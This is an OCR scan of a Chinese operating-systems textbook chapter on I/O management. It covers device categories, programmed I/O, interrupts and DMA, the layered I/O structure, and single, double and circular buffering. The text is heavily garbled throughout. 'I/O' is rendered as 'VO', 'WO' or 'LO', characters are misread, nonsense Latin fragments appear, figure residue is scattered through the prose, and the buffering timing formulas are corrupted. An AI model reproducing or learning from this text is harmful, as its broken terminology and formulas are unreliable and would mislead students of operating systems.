第 11 章 首先 概要 介绍 了 VO 存储 设备 和 操作 系统 中 IO 功能 的 组 织 。 然 后 讨论 了 用 来 提高 
性 能 的 不 同 缓冲 策略 。 本 章 的 其 余部 分 专门 介绍 了 磁盘 IO。 其 中 讨论 了 多 个 磁盘 请 求 的 调度 方 
法 一 一 利用 磁盘 访问 的 物理 特性 来 政 进 响应 时 间 。 接 着 考察 了 利用 磁盘 阵列 来 政 善 性 能 和 可 靠 
性 。 最 后 ， 讨 论 了 磁盘 高 速 缓存 。 


第 12 章 : 文件 管理 


第 12 章 综述 了 各 种 类 型 的 文件 组 织 并 且 考 察 了 与 文件 管理 和 文件 访问 相关 的 操作 系统 问 
题 。 本章 讨论 了 数据 的 物理 和 晒 辑 组 织 ,介绍 了 一 个 典型 的 操作 系统 向 用 户 提供 的 文件 管理 相关 
的 服务 。 最 后 介绍 了 文件 管理 系统 中 的 特殊 机 制 和 数据 结构 。 


第 11 章 VO 管理 和 磁盘 调度 


输入 /输出 可 能 是 操作 系统 设计 中 最 困难 的 部 分 。 这 是 因为 存在 许多 不 同 的 设备 和 它们 的 应 
用 ， 因 此 很 难 有 一 个 通用 、 一 致 的 解决 方案 。 

本 章 首先 简要 介绍 IO 存储 设备 和 操作 系统 中 IO 功能 的 组 织 。 这 些 主题 通常 包含 在 计算 机 
体系 结构 的 范围 内 ， 这 里 是 为 从 操作 系统 的 角度 研究 VO 做 准备 。 

接 下 来 一 节 将 分 析 操 作 系 统 的 设计 问题 , 包括 设计 目标 和 IO 功能 以 何 种 方式 组 织 。 然 后 分 
析 IO 缓冲 ， 缓 冲 功能 是 操作 系统 提供 的 一 种 基本 IO 服务 ， 它 可 以 提升 整体 性 能 。 

再 下 来 一 节 将 专门 讲述 磁盘 IO。 在 现代 系统 中 ， 这 种 形式 的 IO 是 最 重要 的 ， 而 且 对 用 户 
所 能 感知 的 性 能 至 关 重 要 。 这 一 节 中 先 建立 一 个 磁盘 IO 性 能 模型 ,然后 分 析 几 种 可 用 于 提高 性 
能 的 技术 。 

本 章 的 附录 总 结 了 辅助 存储 设备 的 特点 ， 包 括 磁盘 和 光 存 储 器 。 


11.1 W/O 设备 


正如 第 1 章 所 提 到 的 ， 计 算 机 系统 中 参与 VO 的 外 部 设备 大 体 上 可 以 分 为 以 下 三 类 : 

e 人 可 读 : 适用 于 同 计算 机 用 户 之 间 的 交互 ， 例 如 打印 机 和 终端 ， 后 者 又 包括 了 显示 器 和 
键盘 ， 以 及 其 他 一 些 可 能 的 设备 ， 如 鼠标 。 

@ 机 器 可 读 : 适用 于 与 电子 设备 通信 ， 例 如 磁盘 驱动 器 、USB 密 钥 、 传 感 器 、 控 制 器 和 执 
行 器 。 

@ 通信 : 适用 于 与 远程 设备 通信 ， 例 如 数字 线路 驱动 器 和 调制 解 调 器 。 

各 类 别 之 间 有 很 大 的 差别 , 甚至 同一 类 别 内 的 不 同 设备 之 间 也 有 相当 大 的 差异 。 主 要 差别 包括 ， 

o 数据 速率 : 数据 传送 速率 可 能 会 相差 几 个 数量 级 ， 图 11.1 给 出 了 一 些 例子 。 





数据 率 (bps) 
图 11.1 典型 的 IO 设备 数据 速率 
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MA: 设备 用 途 对 操作 系统 及 其 支撑 设施 中 的 软件 和 策略 都 有 影响 。 例 如 ， 用 于 存储 文 
件 的 磁盘 需要 文件 管理 软件 的 支持 ; 在 虚拟 存储 系统 中 ， 用 于 页 面 备份 的 磁盘 ， 其 特性 
取决 于 虚拟 存储 器 硬件 和 软件 是 如 何 使 用 的 。 此 外 ， 这 些 应 用 对 磁盘 调度 算法 也 会 产生 
影响 〈 在 本 章 后 面 讲述 )。 再 举 一 个 例子 , 终端 可 以 被 普通 用 户 使 用 ,也 可 以 被 系统 管理 
员 使 用 。 这 两 种 使 用 情况 隐 含 了 不 同 的 特权 级 别 ， 而 且 可 能 在 操作 系统 中 拥有 不 同 的 优 
先 级 。 

控制 的 复杂 性 : 打印 机 仅 需 要 一 个 相对 简单 的 控制 接口 ， 而 磁盘 的 控制 接口 就 要 复杂 得 
多 。 这 些 差别 对 操作 系统 的 影响 在 某 种 程度 上 被 控制 该 设备 的 WO 模块 的 复杂 性 所 过 滤 ， 
这 将 在 下 节 讨 论 。 

传送 单位 : 数据 可 以 按照 字 节 流 或 者 字符 流 的 形式 传送 (如 终端 IO )， 也 可 以 按 更 大 的 
块 传送 ( 如 磁盘 VO )。 

数据 表示 : 不 同 的 设备 使 用 不 同 的 数据 编码 方式 ， 这 些 差别 包括 字符 编码 和 奇偶 约定 。 
aie: 随 着 设备 的 不 同 ， 错 误 的 性 质 、 报 告 错误 的 方式 、 错 误 造 成 的 后 果 以 及 有 效 
的 响应 范围 都 各 不 相同 。 


由 于 这 些 差异 的 存在 , 使 得 不 管 是 从 操作 系统 的 角度 , 还 是 从 用 户 进程 的 角度 ,都 很 难 找 出 
一 种 统一 的 、 一 致 的 IO 解决 方法 。 


11.2 


IO 功能 的 组 织 


在 1.7 节 中 总 结 了 执行 IO 的 三 种 技术 : 


可 编程 O: 处 理 器 代表 一 个 进程 给 IO 模块 发 送 一 个 IO 命令 ; 该 进程 进入 忙 等 待 ， 直 
到 操作 完成 才 可 以 继续 执行 。 

中 断 驱动 /O: 处 理 器 代表 进程 向 VO 模块 发 出 一 个 IO 命令 。 有 两 种 可 能 性 : 如 果 来 自 
进程 的 IO 指令 是 非 阻塞 的 ， 那 么 处 理 器 继续 执行 发 出 1/O 命令 的 进程 的 后 续 指令 。 如 
R IO 指令 是 阻塞 的 ， 那 么 处 理 器 执行 的 下 一 条 指令 则 来 自 操作 系统 ， 它 将 当前 的 进程 
设置 为 阻塞 态 并 且 调 度 其 他 进程 。 

直接 存储 器 访问 (DMA): 一 个 DMA 模块 控制 内 存 和 VO 模块 之 间 的 数据 交换 。 为 传送 
一 块 数据 ,处 理 器 给 DMA 模块 发 请 求 , 并 且 只 有 当 整 个 数据 块 传送 结束 后 ， 它 才 被 中 断 。 


表 11.1 描述 了 这 三 种 技术 之 间 的 关系 。 在 大 多 数 计算 机 系统 中 ，DMA 是 操作 系统 必须 支持 


的 主要 的 数据 传送 形式 。 
表 11.1 VORË 
无 中 断 使 用 中 断 
通过 处 理 器 实现 MO- 内 存 间 的 传送 可 编程 TO 中 断 驱动 7O 
1/0- 内 存 间 直接 传送 直接 存储 器 访问 (DMA) 
11.2.1 VO 功能 的 发 展 


随 着 计算 机 系统 的 发 展 , 单个 部 件 的 复杂 度 和 完善 度 也 随 之 增加 。 这 在 IO 功能 上 表现 得 最 
为 明显 。LO 功能 的 发 展 可 概括 为 以 下 阶段 : 

1) 处 理 器 直接 控制 外 围 设备 ， 这 在 简单 的 微 处 理 器 控制 设备 中 可 以 见 到 。 

2) 增加 了 控制 器 或 VO 模块 。 处 理 器 使 用 非 中 断 的 可 编程 W/O。 在 这 一 阶段 ,处 理 器 开始 从 


外 部 设备 接口 的 具体 细节 中 分 离 出 来 。 


3) 本 阶段 所 使 用 的 配置 与 阶段 2 相同 ， 但 是 采用 了 中 断 方式 。 处 理 器 无 需 花费 等 待 执行 一 
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次 IO 操作 所 需 的 时 间 ， 因 而 提高 了 效率 。 
4) VO 模块 通过 DMA 直接 控制 存储 器 。 现 在 可 以 在 没有 处 理 器 参与 的 情况 下 ， 扒 内存 中 移 
出 或 者 往 内 存 中 移 人 一 块 数据 ， 仅 仅 在 传送 开始 和 结束 时 需要 用 到 处 理 器 。 
5) IO 模块 被 增强 成 一 个 单独 的 处 理 器 ， 有 专门 为 VO 设计 的 指令 集 。 中 央 处 理 器 (CPU) 
指导 IO 处 理 器 执行 内 存 中 的 一 个 VO RF, VO 处 理 器 在 没有 处 理 器 干涉 的 情况 下 取 指 
令 并 执行 这 些 指令 。 这 就 使 得 处 理 器 可 以 指定 一 系列 的 MO 活动 ， 并 且 只 有 当 整 个 序列 
执行 完成 后 处 理 器 才 被 中 断 。 
6) WO 模块 有 自己 的 局 部 存储 器 ， 事 实 上 ， 其 本 身 就 是 _ 台 计算 机 。 使 用 这 种 体系 结构 可 
以 控制 许多 VO 设备 ， 并 且 使 需要 处 理 器 参与 的 部 分 降 到 最 小 。 这 种 结构 通常 用 于 控制 
与 交互 终端 的 通信 ，1/O 处 理 器 负责 大 多 数控 制 终端 的 任务 。 
综观 上 面 的 IO 发 展 过 程 可 以 发 现 , 越 来 越 多 的 IO 功能 可 以 在 没有 处 理 器 参与 的 情况 下 执 
行 。 中 央 处 理 器 逐步 从 VO 任务 中 解脱 出 来 ， 从 而 提高 了 性 能 。 在 最 后 两 个 阶段 ( 即 5 和 6)， 
一 个 主要 变化 是 引 人 了 可 执行 程序 的 UO 模块 的 概念 。 
注意 ， 对 从 阶段 4 到 阶段 6 中 描述 的 所 有 模块 ， 用 术语 直接 存储 器 访问 (DMA) 是 最 适合 
的 ， 因 为 所 有 这 刀 种 类 型 都 包括 了 通过 LO 模块 对 内 存 的 直接 控制 ; 阶段 5 中 的 VO 模块 通常 称 
做 VO 通道 ; 阶段 6 中 的 称 做 I/O 处 理 器 。 但 是 ， 这 两 个 术语 有 时 也 同时 适用 于 这 两 种 情况 。 在 
本 节 的 后 半 部 分 ， 对 这 两 类 IO 模块 均 使 用 术语 IO 通道 。 


11.2.2 ”直接 存储 器 访问 


图 11.2 概括 地 给 出 了 DMA 逻辑 。DMA 单元 能 够 模拟 处 理 嚣 ， 而 且 实 际 上 能 够 像 处 理 器 一 
样 获得 系统 总 线 的 控制 权 。 为 了 能 在 系统 总 线 上 与 存储 器 进行 
双向 传送 数据 ， 它 需要 这 样 做 。 
DMA 技术 工作 流程 如 下 : 当 处 理 器 想 读 或 写 一 块 数据 时 ， 
它 通过 向 DMA 模块 发 送 以 下 信息 来 给 DMA 模块 发 出 一 条 
命令 : 数据 线 
@ 是 否 请 求 读 操作 或 写 操 作 , 通过 在 处 理 器 和 DMA 模块 
之 间 使 用 读 写 控制 线 发 送 。 地 址 线 
@ 相关 的 IO 设备 地 址 ， 通 过 数据 线 传送 。 有 
@ 从 存储 器 中 读 或 者 往 存储 器 中 写 的 起 始 地 址 ， 在 数据 DMA mA 
线 上 传送 ， 并 由 DMA 模块 保存 在 其 地 址 寄存 器 中 。 
o 读 或 写 的 字数 ,也 是 通过 数据 线 传送 , 并 由 DMA 模块 
保存 在 其 数据 计数 寄存 器 中 。 
然后 处 理 器 继续 其 他 工作 ， 此 时 它 已 经 把 这 个 IO 操作 委 2 烘 型 的 DMA 框图 
托 给 DMA Ri, DMA 模块 直接 从 存储 器 中 或 往 存 储 器 中 传送 整 块 数据 ， 一 次 传送 一 个 字 ， 并 
且 不 再 需要 通过 处 理 器 。 传 送 结束 后 DMA 模块 给 处 理 器 发 送 一 个 中 断 信 号 。 因 此 ， 只 有 在 传 
送 开始 和 结束 时 才 会 用 到 处 理 器 ， 如 图 1.19c 所 示 。 
DMA 机 制 可 以 按 多 种 方法 配置 , 图 11.3 给 出 了 一 些 可 能 的 配置 情况 。 在 第 一 个 例子 中 ,所 
有 模块 共享 同一 个 系统 总 线 , DMA 模块 担当 起 代理 处 理 器 的 作用 , 它 使 用 可 编程 IO 通过 DMA 
模块 在 存储 器 和 IO 模块 之 间 交 换 数 据 。 尽 管 这 个 配置 可 能 开销 并 不 大 , 但 显然 是 低 效 的 : 跟 处 
理 器 控制 的 可 编程 VO 一样， 每 传送 一 个 字 需 要 两 个 总 线 周期 ( 传送 请 求 以 及 之 后 的 传送 )。 
通过 把 DMA 和 VO 功能 集成 起 来 ， 可 以 大 大 地 减少 所 需要 的 总 线 周期 的 数目， 如 图 11.3b 
所 示 。 这 意味 着 除了 系统 总 线 之 外 ， 在 DMA 模块 和 一 个 或 多 个 IO 模块 之 间 还 存在 着 一 条 不 包 
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含 系统 总 线 的 路 径 。DMA 逻辑 实际 上 可 能 就 是 VO 模块 的 一 部 分 ,或 者 可 能 是 控制 一 个 或 多 个 
WO 模块 的 一 个 单独 模块 。 通 过 使 用 一 个 VO 总 线 连接 VO 模块 和 DMA 模块 ， 如 图 11.3e 所 示 ， 

可 以 进一步 拓展 这 个 概念 。 这 就 使 得 DMA 模块 中 VO 接口 的 数目 减少 到 1， 并 且 提 供 了 一 种 可 
以 很 容易 地 进行 扩展 的 配置 。 在 所 有 这 些 情 况 中 , 如 图 11.3b 和 图 11.3c 所 示 ，DMA 模块 与 处 理 
器 、 内 存 所 共享 的 系统 总 线 ， 仅 仅 用 于 DMA 模块 同 内 存 交 换 数 据 以 及 同 处 理 器 交换 控制 信号 。 

DMA 和 IO 模块 之 间 的 数据 交换 是 脱离 系统 总 线 完成 的 。 





系统 总 线 





图 11.3 可 选择 的 DMA 配置 


11.3 操作 系统 设计 问题 


11.3.1 设计 目标 


在 设计 IO 机 制 时 ， 有 两 个 最 重要 的 目标 : 效率 和 通用 性 。 效 率 是 重要 的 ， 这 是 因为 WO 操 
作 通 常 是 计算 机 系统 的 瓶颈 。 再 回 到 图 11.1， 从 中 可 以 看 出 ， 与 肉 存 和 处 理 器 相 比 ， 大 多 数 I/O 
设备 速度 都 是 非常 低 的。 解决 这 个 问题 的 一 种 方法 是 多 道 程序 设计 , 正如 我 们 所 看 到 移 ， 多 道 程 
序 设计 允许 在 一 个 进程 执行 的 同时 其 他 一 些 进程 在 等 待 VO 操作 。 但是, 即使 到 了 计算 机 中 拥有 
大 量 内 存 的 今天 ，LO 操作 跟 不 上 处 理 器 活动 的 情况 仍然 频繁 出 现 。 交 换 技术 用 于 将 额外 的 就 绪 
进程 加 载 到 内 存 ， 从 而 保持 处 理 器 处 于 工作 状态 ， 但 这 本 身 就 是 一 个 VO RHE. Aik, VO 设计 
的 一 个 主要 任务 就 是 提高 VO 的 效率 。 目 前 ， BEE WS SE ee IO， 本 章 的 大 部 
分 内容 专门 研究 磁盘 VO 的 效率 。 

另 一 个 重要 目标 是 通用 性 。 由于 简单 和 如 免 错误 的 考虑 ， 人 们 希望 能 用 一 种 统一 的 方式 处 理 
所 有 的 设备 。 这 意味 着 从 两 个 方面 都 需要 统一 , 一 个 是 处 理 器 看 待 WO 设备 的 方式 , 另 一 个 是 操 
作 系 统管 理 IO 设备 和 VO 操作 的 方式 。 由 于 设备 特性 的 多 样 性 , 在 实际 中 很 难 真 正 实现 通用 性 。 
目前 所 能 做 的 就 是 用 一 种 层次 化 、 模 块 化 的 方法 设计 LO 功能 。 这 种 方法 隐藏 了 大 部 分 IO 设备 
低层 例 程 中 的 细节 ， 使 得 用 户 进程 和 操作 系统 高 层 可 以 通过 ,诸如 读 、 写 、 打 开 、 关 闭 、 加 锁 、 
解锁 等 一 些 通用 的 函数 来 看 待 WO 设备 。 下 面 将 详细 讲述 这 种 方法 。 
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11.3.2 1O 功能 的 逻辑 结构 


在 第 2 章 讲 述 系统 结构 时 , 曾 重点 讲述 了 现代 操作 系统 的 层次 特性 。 分 层 的 原理 是 , 操作 系 
统 的 功能 可 以 根据 其 复杂 性 、 特 征 时 间 尺 度 ( time scale) 和 抽象 层 次 被 分 开 。 按 照 这 个 方法 ， 
可 以 将 操作 系统 组 织 分 成 一 系列 层次 。 每 一 层 都 执行 操作 系统 所 需要 的 功能 的 一 个 相关 子 集 , 它 
依赖 于 更 低 一 层 所 执行 的 更 原始 的 功能 ， 从 而 可 以 隐藏 这 些 功能 的 细节 。 同 时, 它 又 给 高 一 层 提 
供 服 务 。 理 想 情 况 下 ,这些 层 应 该 定义 成 某 一 层 的 变化 不 需要 改动 其 他 层 。 因 此 , 我 们 可 以 把 一 
个 问题 分 解 成 一 些 更 易于 控制 的 子 问题 。 

一 般 来 说 , BB, 处理 的 时 间 尺 度 就 越 短 。 操 作 系 统 的 某 些 部 分 必须 直接 与 计算 机 硬件 
交互 , 这 时 一 个 事件 的 时 间 尺 度 只 有 几 个 十 亿 分 之 一 秒 。 而 在 另 一 端 , 操作 系统 的 某 些 部 分 必须 
与 用 户 交 互 , 而 用 户 以 一 种 比较 修 闲 的 速度 发 出 命令 , 可 能 是 每 几 秒 一 次 。 多 层 结构 非常 适合 这 

把 这 种 原理 应 用 于 IO 机 制 可 以 得 到 如 图 11.4 所 示 的 组 织 类 型 ( 对 照 表 2.4 )。 组 织 的 细节 
取决 于 设备 的 类 型 和 应 用 程序 。 图 中 给 出 了 三 个 最 重要 的 逻辑 结构 。 当 然 , 一 个 特定 的 操作 系统 
可 能 并 不 完全 符合 这 些 结构 , 但 是 , 它 的 基本 原则 是 有 效 的 , 并 且 大 多 数 操作 系统 都 通过 类 似 的 
途径 进行 /O。 

首先 考虑 一 种 最 简单 的 情况 ,本 地 外 围 设备 以 一 种 简单 的 方式 进行 通信 ,如 字 节 流 或 记录 流 ， 
如 图 11.4a 所 示 ， 那 么 会 涉及 下 面 的 几 层 : 

o 逻辑 |/O: 逻辑 7O 模块 把 设备 当做 一 个 逻辑 资源 来 处 理 , 它 并 不 关心 实际 控制 设备 的 细 

4, 2B IO 模块 代表 用 户 进程 管理 的 一 般 的 IO 功能 ， 允 许 用 户 进程 根据 设备 标识 符 
以 及 诸如 打开 、 关 闭 、 读 、 写 之 类 的 简单 命令 与 设备 打交道 。 

o 设备 VO: 请 求 的 操作 和 数据 ( 缓冲 的 数据 、 记 录 等 ) 被 转换 成 适当 的 IO 指令 序列 、 通 
道 命令 和 控制 器 指令 。 可 以 使 用 缓冲 技术 来 提高 使 用 率 。 

e 调度 和 控制 : VO 操作 的 排队 、 调 度 实 际 上 发 生 在 这 一 层 。 因 此 , 在 这 一 层 处 理 中 断 ， 收 
集 并 报告 IO 状态 。 这 一 层 是 与 VO 模块 和 设备 硬件 真正 发 生 交互 的 软件 层 。 

就 一 个 通信 设备 而 言 ，1/O 结构 ( 如 图 11.4b 所 示 ) 看 上 去 和 刚才 描述 的 几乎 一 样 。 主 要 差 

别 是 逻辑 VO 模块 被 通信 体系 结构 取代 ， 通 信 体 系 结构 自身 也 是 由 许多 层 组 成 的 。 一 个 例子 是 
TCP/IP, Æ% 17 章 有 其 详细 描述 。 

图 11.4c 显示 了 一 个 有 代表 性 的 结构 , 该 结构 常用 于 在 支持 文件 系统 的 辅 存 设备 上 管理 IO。 
这 里 用 到 了 前 面 没有 讲 到 的 三 层 : 

@ 目录 管理 : 在 这 一 层 ， 符 号 文件 名 被 转换 成 标识 符 ， 用 标识 符 可 以 通过 文件 描述 符 表 或 
索引 表 直 接 或 间接 地 访问 文件 。 这 一 层 还 处 理 影 响 文件 目录 的 用 户 操作 ， 如 添加 、 删 除 、 
重新 组 织 等 。 

@ 文件 系统 : 这 一 层 处 理 文件 的 逻辑 结构 以 及 用 户 指 定 的 操作 ， 如 打开 、 关 闭 、 读 、 写 等 。 
这 一 层 还 管理 访问 权限 。 

@ 物理 组 织 ， 就 像 考虑 到 分 段 和 分 页 结构 ， 虚 拟 内 存 地 址 必须 转换 成 物理 内 存 地 址 一 样 ， 
考虑 到 辅 存 设备 的 物理 磁道 和 扇 区 结构 ， 对 于 文件 和 记录 的 逻辑 访问 也 必须 转换 成 物理 
外 存 地 址 。 辅 助 存储 空间 和 内 存 缓冲 区 的 分 配 通 常 也 在 这 一 层 处 理 。 

由 于 文件 系统 的 重要 性 ， 本 章 和 第 12 章 将 专门 花费 一 些 时 间 来 讲述 它 的 各 个 部 分 。 本 章 的 

论述 主要 集中 在 比较 低 的 三 层 中 ， 比 较 高 的 两 层 将 在 第 12 章 讲 述 。 
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a) AMEE b) 通信 端口 c) 文件 系统 
图 11.4 一 个 WO 组 织 的 模型 


11.4 1/O 缓冲 


假设 某 个 用 户 进程 需要 从 磁盘 中 读 人 多 个 数据 块 ， 每 次 读 一 块 ， 每 块 的 长 度 为 512 个 字 节 。 
这 些 数 据 将 被 读 人 用 户 进程 地 址 空间 中 的 一 个 区 域 , 如 从 虚拟 地 址 1000 到 1511 的 区 域 。 最 简单 
的 方法 是 对 磁盘 单元 执行 一 个 IO 命令 (类 似 于 Read_Block[ 1000,disk ] ), 并 等 待 数据 传输 完毕 。 
这 个 等 待 可 以 是 忙 等 待 (不断 地 测试 设备 状态 )， 也 可 以 是 进程 被 中 断 挂 起 。 

这 种 方法 存在 两 个 问题 。 首 先 , 程序 被 挂 起 ， 等待 相 对 比较 慢 的 IO 完成 。 第 二 个 问题 是 这 
种 IO 方法 干扰 了 操作 系统 的 交换 决策 。 在 数据 块 传送 期 间 ， 从 1000 到 1511 的 虚拟 地 址 单元 必 
须 保留 在 内 存 中 , BU, 某 些 数据 就 有 可 能 丢失 。 如 果 使 用 了 分 页 机 制 , 那么 至 少 需 要 将 包含 目 
标 地 址 单元 的 页 锁定 在 内 存 中 。 因 此 , 尽管 该 进程 的 一 部 分 页 面 可 能 被 交换 到 磁盘 , 但 不 可 能 把 
该 进程 全 部 换 出 ， 即 使 操作 系统 想 这 么 做 也 不 行 。 还 需要 注意 的 是 有 可 能 出 现 单 进程 死 锁 。 如 果 
一 个 进程 发 出 一 个 VO 命令 并 被 挂 起 等 待 结果 , 然后 在 开始 VO 操作 之 前 被 换 出 , 那么 该 进程 被 
HE, RER IO 事件 的 发 生 ， 此 时 ，LO 操作 也 被 阻塞 ， 它 等 待 该 进程 被 换 人 。 为 避免 死 锁 ， 
在 发 出 IO 请 求 之 前 ， 参 与 IO 操作 的 用 户 存储 空间 必须 被 立即 锁定 在 内 存 中 ， 即 使 这 个 WO 操 
作 正 在 排队 ， 并 且 在 一 段 时 间 内 不 会 被 执行 。 

同样 的 考虑 也 适用 于 输出 操作 。 如 果 一 个 数据 块 从 用 户 进程 区 域 被 直接 传送 到 一 个 IO 模 
k, 那么 在 传送 过 程 中 ， 该 进程 被 锁定 ， 并 且 不 会 被 换 出 。 

为 避免 这 些 开销 和 低 效 操作 ， 有 时 为 了 方便 起 见 ， 在 输入 请 求 发 出 前 就 开始 执行 输入 传送 ， 
并 且 在 输出 请 求 发 出 一 段 时 间 之 后 才 开 始 执 行 输出 传送 , 这 项 技术 称 为 缓冲 。 本 节 将 讲述 几 个 操 
作 系统 所 支持 并 能 提高 系统 性 能 的 缓冲 方案 。 
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在 讨论 各 种 缓冲 方法 时 ， 有 时 候 需 要 区 分 两 类 LO 设备 : 面向 块 的 VO 设备 和 面向 流 的 IO 
设备 。 面 向 块 block-oriented) 的 设备 将 信息 保存 在 块 中 ，, 块 的 大 小 通常 是 固定 的 ,传输 过 程 中 
一 次 传送 一 块 。 通 常 可 以 通过 块 号 访问 数据 。 磁 盘 和 USB 智能 卡 都 是 面向 块 的 设备 。 面 向 流 
( stream-oriented ) 的 设备 以 字 节 流 的 方式 输入 输出 数据 , 没有 块 结构 。 终 端 、 打 印 机 、 通 信 端 口 、 
鼠标 和 其 他 指示 设备 以 及 其 他 大 多 数 的 非 辅 存 设备 ， 都 属于 面向 流 的 设备 。 


11.4.1 单 缓 冲 


操作 系统 提供 的 最 简单 的 类 型 是 单 缓冲 ， 如 图 11.5b 所 示 。 当 用 户 进程 发 出 VO 请 求 时 ， 操 
作 系统 给 该 操作 分 配 一 个 位 于 内 存 中 系统 部 分 的 缓冲 区 。 


操作 系统 


IO 设备 





a) 没有 缓冲 
操作 系统 


IO 设备 





操作 系统 用 户 进程 









V0 设备 移动 到 


10 BS. 移动 到 


d) 循环 缓冲 


图 11.5 LO 缓冲 方案 (输入 ) 


对 于 面向 块 的 设备 , 单 缓冲 方案 可 以 描述 如 下 : 输入 传送 的 数据 被 放 到 系统 缓冲 区 中 。 当 传 
送 完 成 时 ， 进程 把 该 块 移 到 用 户 空间 ， 并 立即 请 求 另 一 块 ， 这 称 做 预 读 , 或 者 预先 输入 。 这 样 做 
原因 是 期 望 这 块 数据 最 终 会 被 使 用 。 对 于 许多 计算 类 型 来 说 ,这 个 假设 在 大 多 数 情 况 下 是 合理 的 ， 
因为 数据 通常 是 被 顺序 访问 的 。 只 有 在 处 理 序列 的 最 后 ， 才 会 读 人 一 个 不 必要 的 块 。 

相对 于 无 系统 缓冲 的 情况 , 这 种 方法 通常 会 提高 系统 速度 。 用 户 进程 可 以 在 下 一 数据 块 读 取 
的 同时 , 处 理 已 读 入 的 数据 块 。 由 于 输入 发 生 在 系统 内 存 中 而 不 是 用 户 进程 内 存 , 因此 操作 系统 
可 以 将 该 进程 换 出 。 但 是 ,这 种 技术 增加 了 操作 系统 的 逻辑 复杂 度 。 操 作 系统 必须 记录 给 用 户 进 
程 分 配 系统 缓冲 区 的 情况 。 交 换 逻 辑 也 受到 影响 : 如 果 IO 操作 所 涉及 的 磁盘 和 用 于 交换 的 磁盘 
是 同一 个 磁盘 , 则 磁盘 写 操作 排队 等 待 将 进程 换 出 到 同一 个 设备 上 是 没有 任何 意义 的 。 若 试图 换 
出 进程 并 释放 内 存 ， 则 要 在 IO 操作 完成 后 才能 开始 ,而 在 这 个 时 候 , 把 进程 换 出 到 磁盘 已 经 不 
再 合适 了 。 

类 似 的 考虑 也 可 以 用 于 面向 块 的 输出 。 当 准备 将 数据 发 送 到 一 台 设 宕 时 , 首先 把 这 些 数据 从 
用 户 空间 复制 到 系统 缓冲 区 , 其 最 终 是 从 系统 缓冲 区 中 被 写 出 的 。 发 请 求 的 进程 现在 可 以 自由 地 
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继续 执行 ， 或 者 在 必要 时 换 出 。 

[ KNUT97 ] 给 出 了 使 用 单 缓 冲 和 不 使 用 缓冲 之 间 的 一 个 粗略 但 能 说 明 问 题 的 性 能 比较 。 假 
设 了 是 输入 一 个 数据 块 所 需要 的 时 间 ，C 是 输入 请 求 之 间 的 计算 时 间 。 如 果 无 缓冲 , 则 每 块 的 执 
行 时 间 为 7 十 C。 如 果 有 一 个 缓冲 区 ， 执 行 时 间 为 max[C, THM, EP M 是 把 数据 从 系统 缓冲 区 
复制 到 用 户 内 存 所 需要 的 时 间 。 在 大 多 数 情况 下 , 使 用 单 缓冲 时 每 块 的 执行 时 间 显著 少 于 没有 组 
冲 的 情况 。 

对 于 面向 流 的 VO, 单 缓冲 方案 能 以 每 次 传送 一 行 的 方式 或 者 每 次 传送 一 个 字 节 的 方式 使 用 。 
每 次 传送 一 行 的 模式 适合 于 滚动 模式 的 终端 (有 时 也 称 为 哑 终 端 )。 对 于 这 种 类 型 的 终端 ， 用 户 
每 次 输入 一 行 , 用 回 车 表示 到 达 行 尾 , 并 且 输 出 到 终端 时 也 是 类 似 地 每 次 输出 一 行 。 行 式 打印 机 
是 这 类 设备 的 另 一 个 例子 。 每 次 传送 一 个 字 节 的 模式 适用 于 表格 模式 终端 , 每 次 击 键 对 它 来 说 都 
很 重要 ， 还 有 许多 其 他 的 外 设 ， 如 传感器 和 控制 器 都 属于 这 种 类 型 。 

对 于 每 次 传送 一 行 的 WO， 可 以 用 缓冲 区 保存 单独 一 行 数据 。 在 输入 期 间 用 户 进程 被 挂 起 ， 
等 待 整 行 的 到 达 。 对 于 输出 ,用户 进程 可 以 把 一 行 输出 放置 在 缓冲 区 中 ,然后 继续 执行 。 它 不 需 
要 挂 起 , 除非 在 第 一 次 输出 操作 的 缓冲 区 内 容 清空 之 前 , 又 需要 发 送 第 二 行 输出 。 对 于 每 次 传送 
一 个 字 节 的 WO， 操 作 系 统 和 用 户 进程 之 间 的 交互 参照 第 5 章 讲述 的 生产 者 /消费 者 模型 。 


11.4.2” 双 缓冲 


作为 对 单 缓冲 方案 的 改进 ， 可 以 给 操作 分 配 两 个 系统 缓冲 区 ， 如 图 11.5c 所 示 。 在 一 个 进程 
往 一 个 缓冲 区 中 传送 数据 ( 从 这 个 缓冲 区 中 取 数 据 ) 的 同时 ， 操 作 系 统 正在 清空 (或 者 填充 ) 另 
一 个 缓冲 区 ， 这 种 技术 称 做 双 缓 冲 或 缓冲 交换 。 

对 于 面向 块 的 传送 ,我 们 可 以 粗略 地 估计 执行 时 间 为 max[C, T] Ak, 如果 C 和 7， 则 有 可 
能 使 面向 块 的 设备 全 速 运行 ; 另 一 方面 ， 如 果 C>7T， 双 缓冲 能 确保 该 进程 不 需要 等 待 VO。 在 
任何 一 种 情况 下 ， 比 单 缓冲 都 有 所 提高 ， 但 这 种 提高 是 以 增加 了 复杂 性 为 代价 的 。 

对 于 面向 流 的 输入 ， 我们 再 次 面临 两 种 可 选择 的 操作 模式 。 对 于 每 次 传送 一 行 的 TO ， 用 户 
进程 不 需要 为 输入 或 输出 挂 起 , 除非 该 进程 的 运行 超过 了 双 缓 冲 的 速度 。 对 于 每 次 传送 一 个 字 节 
的 操作 ， 双 缓冲 与 具有 两 倍 长 度 的 单 缓冲 相 比 ， 并 没有 特别 的 优势 。 这 两 个 情况 都 采用 生产 者 / 
消费 者 模型 。 


11.4.3 ”循环 缓冲 


双 缓 冲 方案 可 以 平滑 IO 设备 和 进程 之 间 的 数据 流 。 如 果 关 注 的 焦点 是 某 个 特定 进程 的 性 
能 ， 那 么 常常 会 希望 相关 VO 操作 能 够 跟 得 上 这 个 进程 。 如 果 该 进程 需要 爆发 式 地 执行 大 量 
的 IO 操作 ， 仅 有 双 缓 冲 就 不 够 了 ， 在 这 种 情况 下 ,通常 使 用 多 于 两 个 缓冲 区 的 方案 来 缓解 
不 足 。 

当 使 用 两 个 以 上 的 缓冲 区 时 ,这 组 缓冲 区 自身 被 当做 循环 缓冲 区 ， 如 图 11.5d 所 示 ， 其 中 的 
每 一 个 缓冲 区 是 这 个 循环 缓冲 区 的 一 个 单元 。 这 就 是 第 5 章 研 究 的 有 界 缓 冲 区 生产 者 /消费 者 
模型 。 


11.4.4 缓冲 的 作用 


缓冲 是 用 来 平滑 VO 需求 峰值 的 一 种 技术 , 但 是 当 进 程 的 平均 需求 大 于 IO 设备 的 服务 能 力 
时 ,缓冲 再 多 也 不 能 让 VO 设备 与 这 个 进程 一 直 并 鸭 齐 驱 。 即 使 有 多 个 缓冲 区 ， 所 有 的 缓冲 区 终 
